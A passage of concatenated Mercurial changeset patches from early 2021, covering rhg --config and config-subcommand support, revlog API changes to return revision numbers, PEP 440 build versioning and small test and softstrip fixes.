.subcommand(add_global_args(commands::$command::args())) )+ } fn subcommand_run_fn(name: &str) -> Option<fn( &ui::Ui, &hg::config::Config, + Option<&Path>, &ArgMatches, ) -> Result<(), CommandError>> { match name { diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -15,7 +15,7 @@ error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context USAGE: - rhg <SUBCOMMAND> + rhg [OPTIONS] <SUBCOMMAND> For more information try --help [252] @@ -204,35 +204,30 @@ $ cd $TESTTMP $ hg init repo1 - $ cd repo1 - $ echo a > a - $ hg commit -A -m'init' + $ echo a > repo1/a + $ hg -R repo1 commit -A -m'init' adding a - $ cd .. $ hg share repo1 repo2 updating working directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved And check that basic rhg commands work with sharing - $ cd repo2 - $ rhg files - a - $ rhg cat -r 0 a + $ rhg files -R repo2 + repo2/a + $ rhg -R repo2 cat -r 0 repo2/a a Same with relative sharing - $ cd .. $ hg share repo2 repo3 --relative updating working directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd repo3 - $ rhg files - a - $ rhg cat -r 0 a + $ rhg files -R repo3 + repo3/a + $ rhg -R repo3 cat -r 0 repo3/a a Same with share-safe # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612822124 -3600 # Mon Feb 08 23:08:44 2021 +0100 # Node ID 2e5dd18d6dc3ee12a9e4098da5b4c8c732cf171e # Parent d8730ff51d5a97dba40046b9a6cac0a66a7e16b6 rhg: Add support for --config CLI arguments Differential Revision: https://phab.mercurial-scm.org/D9971 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -65,9 +65,9 @@ /// Load system and user configuration from various files. /// /// This is also affected by some environment variables. - /// - /// TODO: add a parameter for `--config` CLI arguments - pub fn load() -> Result<Self, ConfigError> { + pub fn load( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Self, ConfigError> { let mut config = Self { layers: Vec::new() }; let opt_rc_path = env::var_os("HGRCPATH"); // HGRCPATH replaces system config @@ -92,6 +92,9 @@ } } } + if let Some(layer) = ConfigLayer::parse_cli_args(cli_config_args)? { + config.layers.push(layer) + } Ok(config) } diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -51,6 +51,49 @@ } } + /// Parse `--config` CLI arguments and return a layer if there’s any + pub(crate) fn parse_cli_args( + cli_config_args: impl IntoIterator<Item = impl AsRef<[u8]>>, + ) -> Result<Option<Self>, ConfigError> { + fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> { + use crate::utils::SliceExt; + + let (section_and_item, value) = split_2(arg, b'=')?; + let (section, item) = split_2(section_and_item.trim(), b'.')?; + Some(( + section.to_owned(), + item.to_owned(), + value.trim().to_owned(), + )) + } + + fn split_2(bytes: &[u8], separator: u8) -> Option<(&[u8], &[u8])> { + let mut iter = bytes.splitn(2, |&byte| byte == separator); + let a = iter.next()?; + let b = iter.next()?; + Some((a, b)) + } + + let mut layer = Self::new(ConfigOrigin::CommandLine); + for arg in cli_config_args { + let arg = arg.as_ref(); + if let Some((section, item, value)) = parse_one(arg) { + layer.add(section, item, value, None); + } else { + Err(HgError::abort(format!( + "malformed --config option: \"{}\" \ + (use --config section.name=value)", + String::from_utf8_lossy(arg), + )))? + } + } + if layer.sections.is_empty() { + Ok(None) + } else { + Ok(Some(layer)) + } + } + /// Returns whether this layer comes from `--config` CLI arguments pub(crate) fn is_from_command_line(&self) -> bool { if let ConfigOrigin::CommandLine = self.origin { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -20,6 +20,17 @@ .value_name("REPO") .takes_value(true), ) + .arg( + Arg::with_name("config") + .help("set/override config option (use 'section.name=value')") + .long("--config") + .value_name("CONFIG") + .takes_value(true) + // Ok: `--config section.key1=val --config section.key2=val2` + .multiple(true) + // Not ok: `--config section.key1=val section.key2=val2` + .number_of_values(1), + ) } fn main() { @@ -47,12 +58,22 @@ // Global arguments can be in either based on e.g. `hg -R ./foo log` v.s. // `hg log -R ./foo` - let global_arg = + let value_of_global_arg = |name| args.value_of_os(name).or_else(|| matches.value_of_os(name)); + // For arguments where multiple occurences are allowed, return a + // possibly-iterator of all values. + let values_of_global_arg = |name: &str| { + let a = matches.values_of_os(name).into_iter().flatten(); + let b = args.values_of_os(name).into_iter().flatten(); + a.chain(b) + }; - let repo_path = global_arg("repository").map(Path::new); + let repo_path = value_of_global_arg("repository").map(Path::new); let result = (|| -> Result<(), CommandError> { - let config = hg::config::Config::load()?; + let config_args = values_of_global_arg("config") + // `get_bytes_from_path` works for OsStr the same as for Path + .map(hg::utils::files::get_bytes_from_path); + let config = hg::config::Config::load(config_args)?; run(&ui, &config, repo_path, args) })(); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612824118 -3600 # Mon Feb 08 23:41:58 2021 +0100 # Node ID a25033eb43b50ccd4947c376894cfb5a9529a861 # Parent 2e5dd18d6dc3ee12a9e4098da5b4c8c732cf171e rhg: add limited support for the `config` sub-command Only with one argument and no flag. This is mostly for testing. Differential Revision: https://phab.mercurial-scm.org/D9972 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -58,8 +58,8 @@ fn parse_one(arg: &[u8]) -> Option<(Vec<u8>, Vec<u8>, Vec<u8>)> { use crate::utils::SliceExt; - let (section_and_item, value) = split_2(arg, b'=')?; - let (section, item) = split_2(section_and_item.trim(), b'.')?; + let (section_and_item, value) = arg.split_2(b'=')?; + let (section, item) = section_and_item.trim().split_2(b'.')?; Some(( section.to_owned(), item.to_owned(), @@ -67,13 +67,6 @@ )) } - fn split_2(bytes: &[u8], separator: u8) -> Option<(&[u8], &[u8])> { - let mut iter = bytes.splitn(2, |&byte| byte == separator); - let a = iter.next()?; - let b = iter.next()?; - Some((a, b)) - } - let mut layer = Self::new(ConfigOrigin::CommandLine); for arg in cli_config_args { let arg = arg.as_ref(); diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -43,10 +43,14 @@ } impl Repo { - /// Search the current directory and its ancestores for a repository: - /// a working directory that contains a `.hg` sub-directory. + /// Find a repository, either at the given path (which must contain a `.hg` + /// sub-directory) or by searching the current directory and its + /// ancestors. /// - /// `explicit_path` is for `--repository` command-line arguments. + /// A method with two very different "modes" like this usually a code smell + /// to make two methods instead, but in this case an `Option` is what rhg + /// sub-commands get from Clap for the `-R` / `--repository` CLI argument. + /// Having two methods would just move that `if` to almost all callers. pub fn find( config: &Config, explicit_path: Option<&Path>, @@ -77,6 +81,28 @@ } } + /// Like `Repo::find`, but not finding a repository is not an error if no + /// explicit path is given. `Ok(None)` is returned in that case. + /// + /// If an explicit path *is* given, not finding a repository there is still + /// an error. + /// + /// For sub-commands that don’t need a repository, configuration should + /// still be affected by a repository’s `.hg/hgrc` file. This is the + /// constructor to use. + pub fn find_optional( + config: &Config, + explicit_path: Option<&Path>, + ) -> Result<Option<Self>, RepoError> { + match Self::find(config, explicit_path) { + Ok(repo) => Ok(Some(repo)), + Err(RepoError::NotFound { .. }) if explicit_path.is_none() => { + Ok(None) + } + Err(error) => Err(error), + } + } + /// To be called after checking that `.hg` is a sub-directory fn new_at_path( working_directory: PathBuf, diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -67,6 +67,7 @@ fn trim_start(&self) -> &Self; fn trim(&self) -> &Self; fn drop_prefix(&self, needle: &Self) -> Option<&Self>; + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])>; } #[allow(clippy::trivially_copy_pass_by_ref)] @@ -116,6 +117,13 @@ None } } + + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])> { + let mut iter = self.splitn(2, |&byte| byte == separator); + let a = iter.next()?; + let b = iter.next()?; + Some((a, b)) + } } pub trait Escaped { diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/config.rs copy from rust/rhg/src/commands/root.rs copy to rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/config.rs @@ -1,30 +1,52 @@ use crate::error::CommandError; use crate::ui::Ui; +use clap::Arg; use clap::ArgMatches; use format_bytes::format_bytes; use hg::config::Config; +use hg::errors::HgError; use hg::repo::Repo; -use hg::utils::files::get_bytes_from_path; +use hg::utils::SliceExt; use std::path::Path; pub const HELP_TEXT: &str = " -Print the root directory of the current repository. - -Returns 0 on success. +With one argument of the form section.name, print just the value of that config item. "; pub fn args() -> clap::App<'static, 'static> { - clap::SubCommand::with_name("root").about(HELP_TEXT) + clap::SubCommand::with_name("config") + .arg( + Arg::with_name("name") + .help("the section.name to print") + .value_name("NAME") + .required(true) + .takes_value(true), + ) + .about(HELP_TEXT) } pub fn run( ui: &Ui, config: &Config, repo_path: Option<&Path>, - _args: &ArgMatches, + args: &ArgMatches, ) -> Result<(), CommandError> { - let repo = Repo::find(config, repo_path)?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + let opt_repo = Repo::find_optional(config, repo_path)?; + let config = if let Some(repo) = &opt_repo { + repo.config() + } else { + config + }; + + let (section, name) = args + .value_of("name") + .expect("missing required CLI argument") + .as_bytes() + .split_2(b'.') + .ok_or_else(|| HgError::abort(""))?; + + let value = config.get(section, name).unwrap_or(b""); + + ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) } diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -134,4 +134,5 @@ debugrequirements files root + config } diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -30,6 +30,18 @@ $ rhg root $TESTTMP/repository +Reading and setting configuration + $ echo "[ui]" >> $HGRCPATH + $ echo "username = user1" >> $HGRCPATH + $ rhg config ui.username + user1 + $ echo "[ui]" >> .hg/hgrc + $ echo "username = user2" >> .hg/hgrc + $ rhg config ui.username + user2 + $ rhg --config ui.username=user3 config ui.username + user3 + Unwritable file descriptor $ rhg root > /dev/full abort: No space left on device (os error 28) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611701771 -3600 # Tue Jan 26 23:56:11 2021 +0100 # Node ID 07984507d553de7cc508d8abc90935ebc78b83c7 # Parent a25033eb43b50ccd4947c376894cfb5a9529a861 revlog: change _addrevision to return the new revision The node is passed as argument already, so returning it is quite pointless. The revision number on the other is useful as it decouples the caller from the revlog internals. Differential Revision: https://phab.mercurial-scm.org/D9880 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2145,7 +2145,7 @@ dfh = self._datafp(b"a+") ifh = self._indexfp(b"a+") try: - return self._addrevision( + self._addrevision( node, rawtext, transaction, @@ -2158,6 +2158,7 @@ dfh, deltacomputer=deltacomputer, ) + return node finally: if dfh: dfh.close() @@ -2329,7 +2330,7 @@ if type(rawtext) == bytes: # only accept immutable objects self._revisioncache = (node, curr, rawtext) self._chainbasecache[curr] = deltainfo.chainbase - return node + return curr def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset): # Files opened in a+ mode have inconsistent behavior on various # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611705320 -3600 # Wed Jan 27 00:55:20 2021 +0100 # Node ID 9ee4e988e2beb7f877e024b2804805529ed619f3 # Parent 07984507d553de7cc508d8abc90935ebc78b83c7 revlog: change addrawrevision to return the revision Differential Revision: https://phab.mercurial-scm.org/D9881 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2112,7 +2112,7 @@ if validatehash: self.checkhash(rawtext, node, p1=p1, p2=p2) - return self.addrawrevision( + rev = self.addrawrevision( rawtext, transaction, link, @@ -2123,6 +2123,7 @@ cachedelta=cachedelta, deltacomputer=deltacomputer, ) + return node def addrawrevision( self, @@ -2145,7 +2146,7 @@ dfh = self._datafp(b"a+") ifh = self._indexfp(b"a+") try: - self._addrevision( + return self._addrevision( node, rawtext, transaction, @@ -2158,7 +2159,6 @@ dfh, deltacomputer=deltacomputer, ) - return node finally: if dfh: dfh.close() # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611708197 -3600 # Wed Jan 27 01:43:17 2021 +0100 # Node ID f7b61ad3c64ae0c7eb81da6cb1559d6006b51c0f # Parent 9ee4e988e2beb7f877e024b2804805529ed619f3 revlog: change addrevision to return the new revision, not node Differential Revision: https://phab.mercurial-scm.org/D9882 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -636,7 +636,8 @@ if meta or filedata.startswith(b'\x01\n'): filedata = storageutil.packmeta(meta, filedata) - return self.addrevision(filedata, transaction, linkrev, p1, p2) + rev = self.addrevision(filedata, transaction, linkrev, p1, p2) + return self.node(rev) def addrevision( self, @@ -658,15 +659,16 @@ if validatehash: self._checkhash(revisiondata, node, p1, p2) - if node in self._nodetorev: - return node + rev = self._nodetorev.get(node) + if rev is not None: + return rev - node = self._addrawrevision( + rev = self._addrawrevision( node, revisiondata, transaction, linkrev, p1, p2 ) self._revisioncache[node] = revisiondata - return node + return rev def addgroup( self, @@ -1079,7 +1081,7 @@ self._revtonode[rev] = node self._revisions[node] = entry - return node + return rev class sqliterepository(localrepo.localrepository): diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -598,9 +598,10 @@ parseddate = b"%s %s" % (parseddate, extra) l = [hex(manifest), user, parseddate] + sortedfiles + [b"", desc] text = b"\n".join(l) - return self.addrevision( + rev = self.addrevision( text, transaction, len(self), p1, p2, sidedata=sidedata, flags=flags ) + return self.node(rev) def branchinfo(self, rev): """return the branch name and open/close state of a revision diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -176,7 +176,8 @@ def add(self, text, meta, transaction, link, p1=None, p2=None): if meta or text.startswith(b'\1\n'): text = storageutil.packmeta(meta, text) - return self.addrevision(text, transaction, link, p1, p2) + rev = self.addrevision(text, transaction, link, p1, p2) + return self.node(rev) def renamed(self, node): return storageutil.filerevisioncopied(self, node) diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -734,7 +734,7 @@ flags=0, cachedelta=None, ): - """Add a new revision to the store. + """Add a new revision to the store and return its number. This is similar to ``add()`` except it operates at a lower level. diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1704,9 +1704,10 @@ arraytext, deltatext = m.fastdelta(self.fulltextcache[p1], work) cachedelta = self._revlog.rev(p1), deltatext text = util.buffer(arraytext) - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, p1, p2, cachedelta ) + n = self._revlog.node(rev) except FastdeltaUnavailable: # The first parent manifest isn't already loaded or the # manifest implementation doesn't support fastdelta, so @@ -1724,7 +1725,8 @@ arraytext = None else: text = m.text() - n = self._revlog.addrevision(text, transaction, link, p1, p2) + rev = self._revlog.addrevision(text, transaction, link, p1, p2) + n = self._revlog.node(rev) arraytext = bytearray(text) if arraytext is not None: @@ -1765,9 +1767,10 @@ n = m2.node() if not n: - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, m1.node(), m2.node() ) + n = self._revlog.node(rev) # Save nodeid so parent manifest can calculate its nodeid m.setnode(n) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2106,13 +2106,14 @@ ) node = node or self.hash(rawtext, p1, p2) - if self.index.has_node(node): - return node + rev = self.index.get_rev(node) + if rev is not None: + return rev if validatehash: self.checkhash(rawtext, node, p1=p1, p2=p2) - rev = self.addrawrevision( + return self.addrawrevision( rawtext, transaction, link, @@ -2123,7 +2124,6 @@ cachedelta=cachedelta, deltacomputer=deltacomputer, ) - return node def addrawrevision( self, # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611711291 -3600 # Wed Jan 27 02:34:51 2021 +0100 # Node ID 7a93b7b3dc2d3b23af5a44321ac3c72ccaf6e6a1 # Parent f7b61ad3c64ae0c7eb81da6cb1559d6006b51c0f revlog: change addgroup callbacks to take revision numbers Differential Revision: https://phab.mercurial-scm.org/D9883 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -743,7 +743,7 @@ ) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -754,7 +754,7 @@ text = None storedelta = (deltabase, delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, @@ -766,7 +766,7 @@ ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -318,12 +318,11 @@ efilesset = set() cgnodes = [] - def ondupchangelog(cl, node): - if cl.rev(node) < clstart: - cgnodes.append(node) + def ondupchangelog(cl, rev): + if rev < clstart: + cgnodes.append(cl.node(rev)) - def onchangelog(cl, node): - rev = cl.rev(node) + def onchangelog(cl, rev): ctx = cl.changelogrevision(rev) efilesset.update(ctx.files) repo.register_changeset(rev, ctx) diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -610,9 +610,9 @@ just to access this is costly.""" return self.changelogrevision(rev).branchinfo - def _nodeduplicatecallback(self, transaction, node): + def _nodeduplicatecallback(self, transaction, rev): # keep track of revisions that got "re-added", eg: unbunde of know rev. # # We track them in a list to preserve their order from the source bundle duplicates = transaction.changes.setdefault(b'revduplicates', []) - duplicates.append(self.rev(node)) + duplicates.append(rev) diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -358,15 +358,14 @@ # Linkrev for changelog is always self. return len(cl) - def ondupchangeset(cl, node): - added.append(node) + def ondupchangeset(cl, rev): + added.append(cl.node(rev)) - def onchangeset(cl, node): + def onchangeset(cl, rev): progress.increment() - rev = cl.rev(node) revision = cl.changelogrevision(rev) - added.append(node) + added.append(cl.node(rev)) # We need to preserve the mapping of changelog revision to node # so we can set the linkrev accordingly when manifests are added. @@ -537,8 +536,8 @@ # Chomp off header object. next(objs) - def onchangeset(cl, node): - added.append(node) + def onchangeset(cl, rev): + added.append(cl.node(rev)) rootmanifest.addgroup( iterrevisions(objs, progress), diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -774,8 +774,9 @@ This used to be the default when ``addrevisioncb`` was provided up to Mercurial 5.8. - ``addrevisioncb`` should be called for each node as it is committed. - ``duplicaterevisioncb`` should be called for each pre-existing node. + ``addrevisioncb`` should be called for each new rev as it is committed. + ``duplicaterevisioncb`` should be called for all revs with a + pre-existing node. ``maybemissingparents`` is a bool indicating whether the incoming data may reference parents/ancestor revisions that aren't present. diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2419,11 +2419,12 @@ link = linkmapper(linknode) flags = flags or REVIDX_DEFAULT_FLAGS - if self.index.has_node(node): + rev = self.index.get_rev(node) + if rev is not None: # this can happen if two branches make the same change - self._nodeduplicatecallback(transaction, node) + self._nodeduplicatecallback(transaction, rev) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, rev) empty = False continue @@ -2461,7 +2462,7 @@ # We're only using addgroup() in the context of changegroup # generation so the revision data can always be handled as raw # by the flagprocessor. - self._addrevision( + rev = self._addrevision( node, None, transaction, @@ -2477,7 +2478,7 @@ ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False if not dfh and not self._inline: diff --git a/mercurial/testing/storage.py b/mercurial/testing/storage.py --- a/mercurial/testing/storage.py +++ b/mercurial/testing/storage.py @@ -1129,12 +1129,13 @@ with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( [], @@ -1163,12 +1164,13 @@ with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( deltas, @@ -1217,8 +1219,8 @@ with self._maketransactionfn() as tr: newnodes = [] - def onchangeset(cl, node): - newnodes.append(node) + def onchangeset(cl, rev): + newnodes.append(cl.node(rev)) f.addgroup( deltas, diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -550,7 +550,7 @@ if node in self._indexbynode: if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -560,12 +560,12 @@ else: text = mdiff.patch(self.revision(deltabase), delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, linkrev, p1, p2, flags ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611713234 -3600 # Wed Jan 27 03:07:14 2021 +0100 # Node ID fa7ae7aa0efd2895768a0ad57339a2030fb0fac6 # Parent 7a93b7b3dc2d3b23af5a44321ac3c72ccaf6e6a1 changegroup: don't convert revisions to node for duplicate handling The only consumer can handle revision lists fine. Avoid materializing a range if there are no duplicates as optimization. Differential Revision: https://phab.mercurial-scm.org/D9884 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -316,11 +316,11 @@ self.callback = progress.increment efilesset = set() - cgnodes = [] + duprevs = [] def ondupchangelog(cl, rev): if rev < clstart: - cgnodes.append(cl.node(rev)) + duprevs.append(rev) def onchangelog(cl, rev): ctx = cl.changelogrevision(rev) @@ -448,8 +448,12 @@ if added: phases.registernew(repo, tr, targetphase, added) if phaseall is not None: - phases.advanceboundary(repo, tr, phaseall, cgnodes, revs=added) - cgnodes = [] + if duprevs: + duprevs.extend(added) + else: + duprevs = added + phases.advanceboundary(repo, tr, phaseall, [], revs=duprevs) + duprevs = [] if changesets > 0: # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1612467128 28800 # Thu Feb 04 11:32:08 2021 -0800 # Node ID 02d91167cfc3f3cf57589d6b4356f3869d10f1e9 # Parent fa7ae7aa0efd2895768a0ad57339a2030fb0fac6 tests: add a comment in a test that will hopefully save someone some time I spent at least an hour, probably closer to 1.5, trying to figure out what this was complaining about. Hopefully anyone else in my position will see this note and not waste the time. Differential Revision: https://phab.mercurial-scm.org/D9953 diff --git a/tests/test-check-module-imports.t b/tests/test-check-module-imports.t --- a/tests/test-check-module-imports.t +++ b/tests/test-check-module-imports.t @@ -14,6 +14,10 @@ Known-bad files are excluded by -X as some of them would produce unstable outputs, which should be fixed later. +NOTE: the `hg locate` command here only works on files that are known to +Mercurial. If you add an import of a new file and haven't yet `hg add`ed it, you +will likely receive warnings about a direct import. + $ testrepohg locate 'set:**.py or grep(r"^#!.*?python")' \ > 'tests/**.t' \ > -X hgweb.cgi \ # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1612476702 -3600 # Thu Feb 04 23:11:42 2021 +0100 # Node ID 866eb4d6bd9f305e73a3439af6faa0af66dfebe5 # Parent 02d91167cfc3f3cf57589d6b4356f3869d10f1e9 build: fake PEP440 versions If the current version is not exactly a tag, use a local version specifier to fix it up. PEP 440 uses the "+" separator and only allows alphanumeric and dot, so use dot for further separations. Old devel build: 5.7+155-a163cc36d06b New devel build: 5.7+hg155.a163cc36d06b Differential Revision: https://phab.mercurial-scm.org/D9955 diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -419,9 +419,9 @@ ltag = sysstr(hg.run(ltagcmd)) changessincecmd = ['log', '-T', 'x\n', '-r', "only(.,'%s')" % ltag] changessince = len(hg.run(changessincecmd).splitlines()) - version = '%s+%s-%s' % (ltag, changessince, hgid) + version = '%s+hg%s.%s' % (ltag, changessince, hgid) if version.endswith('+'): - version += time.strftime('%Y%m%d') + version = version[:-1] + 'local' + time.strftime('%Y%m%d') elif os.path.exists('.hg_archival.txt'): kw = dict( [[t.strip() for t in l.split(':', 1)] for l in open('.hg_archival.txt')] @@ -430,11 +430,13 @@ version = kw['tag'] elif 'latesttag' in kw: if 'changessincelatesttag' in kw: - version = '%(latesttag)s+%(changessincelatesttag)s-%(node).12s' % kw + version = ( + '%(latesttag)s+.%(changessincelatesttag)s.%(node).12s' % kw + ) else: - version = '%(latesttag)s+%(latesttagdistance)s-%(node).12s' % kw + version = '%(latesttag)s+.%(latesttagdistance)s.%(node).12s' % kw else: - version = kw.get('node', '')[:12] + version = '0+' + kw.get('node', '')[:12] if version: versionb = version @@ -451,20 +453,6 @@ ), ) -try: - oldpolicy = os.environ.get('HGMODULEPOLICY', None) - os.environ['HGMODULEPOLICY'] = 'py' - from mercurial import __version__ - - version = __version__.version -except ImportError: - version = b'unknown' -finally: - if oldpolicy is None: - del os.environ['HGMODULEPOLICY'] - else: - os.environ['HGMODULEPOLICY'] = oldpolicy - class hgbuild(build): # Insert hgbuildmo first so that files in mercurial/locale/ are found @@ -1683,8 +1671,8 @@ # unicode on Python 2 still works because it won't contain any # non-ascii bytes and will be implicitly converted back to bytes # when operated on. -assert isinstance(version, bytes) -setupversion = version.decode('ascii') +assert isinstance(version, str) +setupversion = version extra = {} # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613130688 -3600 # Fri Feb 12 12:51:28 2021 +0100 # Node ID c3c7a86e9c24f5ee218d6dfa15fe8b912325471a # Parent 866eb4d6bd9f305e73a3439af6faa0af66dfebe5 tests: fix differing output between py2 and py3 db9e33beb0fb broke the tests because of the difference in bytestring repr between py2 and py3. Rather than backout that change for so little, I figured I'd fix it myself. Hopefully Python 2 supports gets dropped very soon. Differential Revision: https://phab.mercurial-scm.org/D9987 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -685,7 +685,7 @@ # We failed to resolve a parent for this node, so # we crash the changegroup construction. raise error.Abort( - b'unable to resolve parent while packing %r %r' + b"unable to resolve parent while packing '%s' %r" b' for changeset %r' % (store.indexfile, rev, clrev) ) diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -147,7 +147,7 @@ $ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0 $ cd narrow2 $ hg pull -q -r 1 - remote: abort: unexpected error: unable to resolve parent while packing b'00manifest.i' 1 for changeset 0 + remote: abort: unexpected error: unable to resolve parent while packing '00manifest.i' 1 for changeset 0 transaction abort! rollback completed abort: pull failed on remote # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612979148 28800 # Wed Feb 10 09:45:48 2021 -0800 # Node ID beaa233e81f7d05560b0ba454f1315fab722de26 # Parent c3c7a86e9c24f5ee218d6dfa15fe8b912325471a softstrip: move _bookmarkmovements() call to where it's needed The call to `_bookmarkmovements()` is unrelated to the backup, so let's move it after. Differential Revision: https://phab.mercurial-scm.org/D9984 diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -308,11 +308,11 @@ if not tostrip: return None - newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) if backup: node = tostrip[0] backupfile = _createstripbackup(repo, tostrip, node, topic) + newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) with repo.transaction(b'strip') as tr: phases.retractboundary(repo, tr, phases.archived, tostrip) bmchanges = [(m, repo[newbmtarget].node()) for m in updatebm] # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612979390 28800 # Wed Feb 10 09:49:50 2021 -0800 # Node ID cd91543431604b0fcaa601a3aa8b3c862f0d7c41 # Parent beaa233e81f7d05560b0ba454f1315fab722de26 softstrip: fix a reference to an undefined variable `backupfile` wasn't defined if no backup was requested. Let's set it to `None` by default, which matches what regular `repair.strip()` does. Differential Revision: https://phab.mercurial-scm.org/D9985 diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -308,6 +308,7 @@ if not tostrip: return None + backupfile = None if backup: node = tostrip[0] backupfile = _createstripbackup(repo, 